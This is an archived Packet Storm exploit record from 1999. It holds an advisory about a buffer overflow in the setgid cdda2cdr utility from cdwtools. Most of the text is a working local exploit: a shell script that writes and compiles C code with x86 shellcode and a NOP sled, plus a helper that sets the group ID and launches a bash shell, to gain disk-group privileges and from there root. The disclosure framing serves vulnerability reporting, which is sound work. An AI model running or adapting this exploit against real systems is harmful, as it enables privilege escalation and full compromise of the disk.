{"id": "PACKETSTORM:16282", "type": "packetstorm", "bulletinFamily": "exploit", "title": "cdda2cdr_bof.txt", "description": "", "published": "1999-10-05T00:00:00", "modified": "1999-10-05T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/16282/cdda2cdr_bof.txt.html", "reporter": "Packet Storm", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:10", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:20:10", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:10", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/16282/cdda2cdr_bof.txt", "sourceData": "`Greetings, \n \nThere is a buffer overflow vulnerability in cdda2cdr distributed with (at \nleast) package cdwtools-0.93-78. This program is sgid disk by default and \nthus any malicious user who gains disk privs will have r/w access to your \nentire hard drive(s) in the form of /dev/hd*. This is obviously a quick root \ncompromise. Fixed packages will be available soon from various vendors \n(probably by the time you read this). \n \nNote that this particular overflow does not affect cdda2wav. \n \nBrock Tellier \nUNIX Systems Administrator \n \n--- cdda2x.sh --- \n#! /bin/sh \n# \n# Shell script for Linux x86 cdda2cdr exploit \n# Brock Tellier btellier@usa.net \n# \n \ncat > /tmp/cdda2x.c <<EOF \n \n/** \n** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros) \n \n** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz> \n** \n** Brock Tellier btellier@usa.net \n**/ \n \n \n#include <stdlib.h> \n#include <stdio.h> \n \nchar exec[]= /* Generic Linux x86 running our /tmp program */ \n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\" \n\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\" \n\"\\x80\\xe8\\xdc\\xff\\xff\\xff/tmp/cd\"; \n \n \n \n#define LEN 500 \n#define NOP 0x90 \n \nunsigned long get_sp(void) { \n \n__asm__(\"movl %esp, %eax\"); \n \n} \n \n \nvoid main(int argc, char *argv[]) { \n \nint offset=0; \nint i; \nint buflen = LEN; \nlong int addr; \nchar buf[LEN]; \n \nif(argc > 3) { \nfprintf(stderr, \"Error: Usage: %s offset buffer\\n\", argv[0]); \nexit(0); \n} \nelse if (argc == 2){ \noffset=atoi(argv[1]); \n \n} \nelse if (argc == 3) { \noffset=atoi(argv[1]); \nbuflen=atoi(argv[2]); \n \n} \nelse { \noffset=500; \nbuflen=500; \n \n} \n \n \naddr=get_sp(); \n \nfprintf(stderr, \"Linux x86 cdda2cdr local disk exploit\\n\"); \nfprintf(stderr, \"Brock Tellier btellier@usa.net\\n\"); \nfprintf(stderr, \"Using addr: 0x%x\\n\", addr+offset); \n \nmemset(buf,NOP,buflen); \nmemcpy(buf+(buflen/2),exec,strlen(exec)); \nfor(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4) \n*(int *)&buf[i]=addr+offset; \n \nexecl(\"/usr/bin/cdda2cdr\", \"cdda2cdr\", \"-D\", buf, NULL); \n \n \n/* \nfor (i=0; i < strlen(buf); i++) putchar(buf[i]); \n*/ \n \n} \n \nEOF \n \ncat > /tmp/cd.c <<EOF \nvoid main() { \nsetregid(getegid(), getegid()); \nsystem(\"/bin/bash\"); \n} \nEOF \n \ngcc -o /tmp/cd /tmp/cd.c \ngcc -o /tmp/cdda2x /tmp/cdda2x.c \necho \"Note that gid=6 leads to easy root access..\" \n/tmp/cdda2x \n \n \n------- \n \n____________________________________________________________________ \nGet free email and a permanent address at http://www.netaddress.com/?N=1 \n`\n", "immutableFields": []}

{}